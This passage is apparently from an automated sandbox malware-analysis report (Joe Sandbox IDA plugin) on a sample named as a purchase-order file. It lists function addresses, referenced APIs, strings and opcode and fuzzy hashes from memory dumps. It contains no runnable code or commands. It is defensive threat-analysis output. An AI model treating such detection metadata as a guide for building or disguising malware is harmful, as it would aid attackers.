Instruction Fuzzy Hash: F2E17C70508342CFD716CF28C490A6ABBE1FF89314F148AADE5D587391DB32E915CB92

Function 0101CF00 Relevance: 1.8, APIs: 1, Instructions: 345timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0101D2C4

Part of subcall function 01088514: RtlDebugPrintTimes.NTDLL ref: 01088579

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: e10a78dcaf6758512c4184883da7c074b6701c40b80995f6e07bada73ff368a5
Instruction ID: a6c9f2f9e02fe68e62751519fb47e55b5aa502d8aaf310e6a3066a64dfcce2cc
Opcode Fuzzy Hash: e10a78dcaf6758512c4184883da7c074b6701c40b80995f6e07bada73ff368a5
Instruction Fuzzy Hash: E6D1E530B003159FEB65DB98C898BAEB7F1BB45314F0440EDE989AB249DB399D81CF51

Function 0102E507 Relevance: 1.8, APIs: 1, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b63fcf257f24bdbfdce5eb1a92717ee7e3efe7a1c8aa9ad31d32eac8392a89fb
Instruction ID: f6bc9db1959ba8daaafb0bd96f7281311ebf8c9205032bb7cc4917908a4acaf6
Opcode Fuzzy Hash: b63fcf257f24bdbfdce5eb1a92717ee7e3efe7a1c8aa9ad31d32eac8392a89fb
Instruction Fuzzy Hash: C5A13771E40226AFEB31DB98D858BADBBE8AB04754F0501A5EAD0AB2C1D7749D00CBD0

Function 01006B70 Relevance: 1.7, APIs: 1, Instructions: 198timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01006CAC

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 1104c0dbfbe348aed390977f343f32e637de5fb6b1f0e0f9b7014a91d1234de1
Instruction ID: 9a61f108c4c039235c84f90fd803fc813d1abfa96fc727ebc180d1f060c61018
Opcode Fuzzy Hash: 1104c0dbfbe348aed390977f343f32e637de5fb6b1f0e0f9b7014a91d1234de1
Instruction Fuzzy Hash: CD818E75A04701CFD766CF58C580A2AB7E6FF88300F1488AEE9868B791CB32E855CB51

Function 0103CCD1 Relevance: 1.7, APIs: 1, Instructions: 197timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0103CD9D

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 1c43669682537c8387b5e1861d7111dd480128acf2a1ccd64791ede6227acd84
Instruction ID: f490a13074d99a514ab6a38fe9cbeca4ca4e915cdc42c4f7a2221f7ad7c808f6
Opcode Fuzzy Hash: 1c43669682537c8387b5e1861d7111dd480128acf2a1ccd64791ede6227acd84
Instruction Fuzzy Hash: 7E61E270E002069FDB59EF68D984BAEBBF5FF48314F1081AAE591EB291D731D901CB54

Function 01022DB0 Relevance: 1.7, Strings: 1, Instructions: 438COMMON

Download Yara Rule

Strings

0, xrefs: 01023160

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 92d0ed9a7a462776e0b5d5088b8ad2326d9f701260ea609c4370b77f8da8f5a5
Instruction ID: 1b563a08f2d5c4d806638b3cb0aadf94e6614afecb324bf837e8c548f1551a59
Opcode Fuzzy Hash: 92d0ed9a7a462776e0b5d5088b8ad2326d9f701260ea609c4370b77f8da8f5a5
Instruction Fuzzy Hash: E1F1B071608362CFCB65CF68C490B6ABBE5BF88710F1448ADF9C98B241DB38D944CB52

Function 00C36D0E Relevance: 1.7, Strings: 1, Instructions: 423COMMON

Download Yara Rule

Strings

(, xrefs: 00C3702F

Memory Dump Source

Source File: 00000000.00000002.22425930183.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.22425875607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.22426016644.0000000000C67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_PO_62401394_MITech_20250601.jbxd

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: df5e5e2717f0ce140d89b5bc111d3416fb7feb460068de0e14075fa43804f937
Instruction ID: ebb575371f09c7cf76d65e6f59f1a426f8dac6e29e775091f8f5313082ed84af
Opcode Fuzzy Hash: df5e5e2717f0ce140d89b5bc111d3416fb7feb460068de0e14075fa43804f937
Instruction Fuzzy Hash: 22022DB6E006199FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80

Function 00C36D13 Relevance: 1.7, Strings: 1, Instructions: 423COMMON

Download Yara Rule

Strings

(, xrefs: 00C3702F

Memory Dump Source

Source File: 00000000.00000002.22425930183.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.22425875607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.22426016644.0000000000C67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_PO_62401394_MITech_20250601.jbxd

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction ID: 4e4f9de4d58a72bd5cc1a3ea5797cc88e3dc61c3b125d33e4519a05856bed19e
Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction Fuzzy Hash: DC021EB6E006189FDB54CF9AC8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80

Function 01002EE8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON

Download Yara Rule

Strings

PATH, xrefs: 01002FF6, 01003044

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: ae176b34c3714934a72ad7d7f89cd396ec4f058c0e8a4b1e363c8920a73e199e
Instruction ID: 00a65ea027d1169873005c94b9d98a71afb77269a76963a3397ec6b5990de5ee
Opcode Fuzzy Hash: ae176b34c3714934a72ad7d7f89cd396ec4f058c0e8a4b1e363c8920a73e199e
Instruction Fuzzy Hash: 40F1A071E00219AFEB26DF99D881AFEBBF1FF48700F048429E981AB384D7759941CB50

Function 0102EB1C Relevance: 1.6, APIs: 1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eaa249c817ceb4b9d512180348fee04d6b9a625c8f3f1ffbd50465b150a6771
Instruction ID: 830af28bde3a9216161dddc90a694e6ecd1d352c982f72a5a75b65a7245cf0f9
Opcode Fuzzy Hash: 3eaa249c817ceb4b9d512180348fee04d6b9a625c8f3f1ffbd50465b150a6771
Instruction Fuzzy Hash: BC41E1B12043169FD725DF68C890A9BBBF9FF98224F10486EE9C7C7615DB35E8448B60

Function 010B1623 Relevance: 1.6, Strings: 1, Instructions: 370COMMON

Download Yara Rule

Strings

., xrefs: 010B1781

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: a954cc4d5d73b84d00897e518e34d3d6406801f246db769ca67935379cde78d1
Instruction ID: 190d722a0793031a23c664920bac2ba941937b3f8b246d22ddd36ac2d9626edf
Opcode Fuzzy Hash: a954cc4d5d73b84d00897e518e34d3d6406801f246db769ca67935379cde78d1
Instruction Fuzzy Hash: F1E1BC75D002688BDB61CFA9D4A06FDBBF1FF44700F54819AE885AB295D774A882CB90

Function 0100254C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01002630

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 4dbee1c2fab523ee4a4241b5ce3d9e2cfe646e565196ddbfa0ff09a18f8ce8c9
Instruction ID: 8aeada48067cc950b83c17ebcd9a671c4f72f0fa578e10435f22b85913f6f8bf
Opcode Fuzzy Hash: 4dbee1c2fab523ee4a4241b5ce3d9e2cfe646e565196ddbfa0ff09a18f8ce8c9
Instruction Fuzzy Hash: E041EFB0501705CFDB66EF28C944AA9B7F5FF58310F1082AEC5878B6E1DB35AA81CB00

Function 01080443 Relevance: 1.6, APIs: 1, Instructions: 114timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 010804BC

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 8d9133d157af11685e9d009d8b6d06e0a5c4779a58e7921ac95a7507e775a340
Instruction ID: 56b00a07317cd9e8763961dab88e6742fb5a313e4645a926161effe183fc10b8
Opcode Fuzzy Hash: 8d9133d157af11685e9d009d8b6d06e0a5c4779a58e7921ac95a7507e775a340
Instruction Fuzzy Hash: 48415EB15083519BD360DF29C845B9BBBE8FF88754F008A2EF9D8D7290DB759504CB92

Function 01004779 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01004817

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: af01bc76201417367f7449891078092ad3f4c109fe7e67c215eedb8e1ba60d83
Instruction ID: 27a3602d795d57ee2b21fe6a66a0de84991abe45686229b8ef03a4633e5eef4b
Opcode Fuzzy Hash: af01bc76201417367f7449891078092ad3f4c109fe7e67c215eedb8e1ba60d83
Instruction Fuzzy Hash: EF419F706042428BE726DF28D894B2ABBE5FB81750F14486DE781CB2E1DB35DA41CB95

Function 0109C7B0 Relevance: 1.6, Strings: 1, Instructions: 353COMMON

Download Yara Rule

Strings

w, xrefs: 0109CBC8

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: w
API String ID: 0-476252946
Opcode ID: c3e11764ae492b917241bea2b0d19cea8094d792d9d81d4c0be05eeef2490d9d
Instruction ID: 557f7ad550a20e7d8274a69d6af43e6e7476c80ed5522948b7c8dcb3ab548495
Opcode Fuzzy Hash: c3e11764ae492b917241bea2b0d19cea8094d792d9d81d4c0be05eeef2490d9d
Instruction Fuzzy Hash: 44D1AC70D00256ABEF24CF58C5A1ABEBBF1FF44704F14849AE8D99B241E335E991E790

Function 010AE750 Relevance: 1.6, APIs: 1, Instructions: 91timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 010AE7B1

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: d71fc0efef75c80a6ec6efc43eebc5483c8a2bd106acb2130246f0feb35ff388
Instruction ID: ad94c31d0eec661553ff5efe01894b3178b184e40b560b9496dfa69d6325f2c8
Opcode Fuzzy Hash: d71fc0efef75c80a6ec6efc43eebc5483c8a2bd106acb2130246f0feb35ff388
Instruction Fuzzy Hash: 9C31AA719053028FCB21EF59C44195ABFF1FF89614F4486AEE4C89B282D731ED45CB92

Function 010000A0 Relevance: 1.6, Strings: 1, Instructions: 321COMMON

Download Yara Rule

Strings

, xrefs: 010001F5

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: de74e325daa8bcb1013735913a35c44bb3b79d30f781606c9739c7dfcd3636a2
Instruction ID: aa626d72f20ce89e408fab4d559607b8eb2af132eb23b714ca5261e257bddfba
Opcode Fuzzy Hash: de74e325daa8bcb1013735913a35c44bb3b79d30f781606c9739c7dfcd3636a2
Instruction Fuzzy Hash: B1A11A31A0425966FFA78A29CC41BFFABE89F55394F0440D9FECAA71C5CA748A44CB50

Function 00FF6DA6 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64a38d8ad582cb7080f3230d40742d7b82c986c5977f0894dde790a6dc7470fa
Instruction ID: 75bacfab0b1128837d45500070bc3e9566a26c632b4ad37efe65b55e62f1bf71
Opcode Fuzzy Hash: 64a38d8ad582cb7080f3230d40742d7b82c986c5977f0894dde790a6dc7470fa
Instruction Fuzzy Hash: 9F01223530460AABDB916B698C809677BE9FB91314F40062CFAC187981CB21EC0186C0

Function 0108A130 Relevance: 1.5, APIs: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0108A19A

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 688a41428f2a5222247d1a227c9eee894681987ad67cd1f8b7f6ca90a70a82ad
Instruction ID: 1b73afbe8f1f01835292a0a17a4ac9324db8b170b415e41d4a4592a956ebc052
Opcode Fuzzy Hash: 688a41428f2a5222247d1a227c9eee894681987ad67cd1f8b7f6ca90a70a82ad
Instruction Fuzzy Hash: 89019A36215119EBDF12AF84DC40EDA3F66FB4C794F058116FE9866620C236E970EF80

Function 010889A0 Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 010889EA

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 42cc5bd2d09fc9e7c2d75b9255afd113ceead5aedd406df5af3a5e6465837442
Instruction ID: 99c37e60123df9dc5d2180f4300d4ea5cdbe4ae11a2c85ea96060c9f70e8245c
Opcode Fuzzy Hash: 42cc5bd2d09fc9e7c2d75b9255afd113ceead5aedd406df5af3a5e6465837442
Instruction Fuzzy Hash: 28F024360042445BE6B2BB0DEC48B9ABF99FB80710F89815AFAC5279928B346C80C780

Function 010A47B4 Relevance: 1.5, Strings: 1, Instructions: 271COMMON

Download Yara Rule

Strings

@, xrefs: 010A4874

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 15de15ed4d3b0a43b0370d01a376e7ee3896bf89bf530a6cde2585de4e9d9ea4
Instruction ID: 718b975ac3d4c3bdb730b6489c5e358fbe63b83dc8b40c90c05e3d46feaa8bce
Opcode Fuzzy Hash: 15de15ed4d3b0a43b0370d01a376e7ee3896bf89bf530a6cde2585de4e9d9ea4
Instruction Fuzzy Hash: D0A18075A0020A9FDB51DFD8C8D0AEEBBF8FF28740F584069EA91E7251E7B49940CB54

Function 010860A0 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 01086241

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 8b844d4d0926b766efd1f46d83cbc2eb5ed0459b3883fe1981a3a39cc7691fa8
Instruction ID: a7bd9351d276fc60849745c961e8cde126aa83ee831089321c0b41ac8c46f72f
Opcode Fuzzy Hash: 8b844d4d0926b766efd1f46d83cbc2eb5ed0459b3883fe1981a3a39cc7691fa8
Instruction Fuzzy Hash: 70919371A00615AFDB21EF98CD85FEE7BB8EF19710F154065F680AB291DB75E900CB90

Function 00EC35C9 Relevance: 1.5, Strings: 1, Instructions: 229COMMON

Download Yara Rule

Strings

d, xrefs: 00EC361D

Memory Dump Source

Source File: 00000000.00000002.22426113758.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: e0ab8c8c1b07638f937e09b6cd82cb689444d0c7a6b7b4a813b2a0b0435e75d5
Instruction ID: 686b2436f2966cc3f5fb9fe7c617737d72ab52a1895a2e74cff3bfe345dba64b
Opcode Fuzzy Hash: e0ab8c8c1b07638f937e09b6cd82cb689444d0c7a6b7b4a813b2a0b0435e75d5
Instruction Fuzzy Hash: E091E77060C7848FD7A4DB28C554BAABBE1FBD8304F50896DB1DAD3361DA34D945CB02

Function 00EC38F2 Relevance: 1.5, Strings: 1, Instructions: 226COMMON

Download Yara Rule

Strings

v, xrefs: 00EC393D

Memory Dump Source

Source File: 00000000.00000002.22426113758.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: v
API String ID: 0-1801730948
Opcode ID: d3ca25dce332f058c063d79055369687c5bbf46a9c89a9c8656977cc88dfbf02
Instruction ID: e0be6b128a6338f074ff07e15ebb0f30eb12bc697998e2e2ef5021fa8e94143a
Opcode Fuzzy Hash: d3ca25dce332f058c063d79055369687c5bbf46a9c89a9c8656977cc88dfbf02
Instruction Fuzzy Hash: A191D63060CB848FD7A4DB2CC154BAABBE2FBD8304F54896DA1DAD3361DA35D945DB02

Function 0103A580 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 010765D4

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: df65d5cdaba984bb52793c006bf6ffd82c6fc56225d04cb3139d06e47c5da01a
Instruction ID: 59b78acc5aa1c7217db22e1a6ea523b99ab317165c30ed8fb2709384a658ba5c
Opcode Fuzzy Hash: df65d5cdaba984bb52793c006bf6ffd82c6fc56225d04cb3139d06e47c5da01a
Instruction Fuzzy Hash: 2B718F71E0061A9FEF64DF9CC5806EDBBF1BF48710F14816EE586A7245EB328941CB68

Function 010102F9 Relevance: 1.4, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#%u, xrefs: 01064B8F

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: #%u
API String ID: 0-232158463
Opcode ID: 70a84d32b63188bf5f0d271d66850321f392b601ce0d8b1b2576658dc5468900
Instruction ID: 09892a872c3edaf33bbfdd847d2a4c06066eb5d89250e4ae4df33ba7782e0c9f
Opcode Fuzzy Hash: 70a84d32b63188bf5f0d271d66850321f392b601ce0d8b1b2576658dc5468900
Instruction Fuzzy Hash: C3715C71A0010A9FDB15DFA9D990BEEBBF8FF18704F144065E941EB255EB38E941CB60

Function 010A44F8 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 010A45FF

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: ed264a81cdf3c9d1e93380683eab726acc9a2fcb241f99c40032a4bb2192be3e
Instruction ID: 963eb07b8a5511194db2f40b664c9ee4c8e7c3926c11c38498bd9dbb7b1c7354
Opcode Fuzzy Hash: ed264a81cdf3c9d1e93380683eab726acc9a2fcb241f99c40032a4bb2192be3e
Instruction Fuzzy Hash: D6519575D0062ADBDF11DFE8C840AEEBBB5AF18B00F494169EA81EB241D7B49D01CBD0

Function 0101E547 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 0101E5C4

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: eea000c37a6337b19068ecc0c61f665b45cea4c95747c67b08feab24117bb2bf
Instruction ID: 93f07ffe9ca4ea34160d71c60e2dfa7b278edb536ca5f7f781124f0121ca63f9
Opcode Fuzzy Hash: eea000c37a6337b19068ecc0c61f665b45cea4c95747c67b08feab24117bb2bf
Instruction Fuzzy Hash: 3441A0725083129BE711DA64C844BAFB6E8AFC8B54F440E2DFAC4E7184EB78D904C792

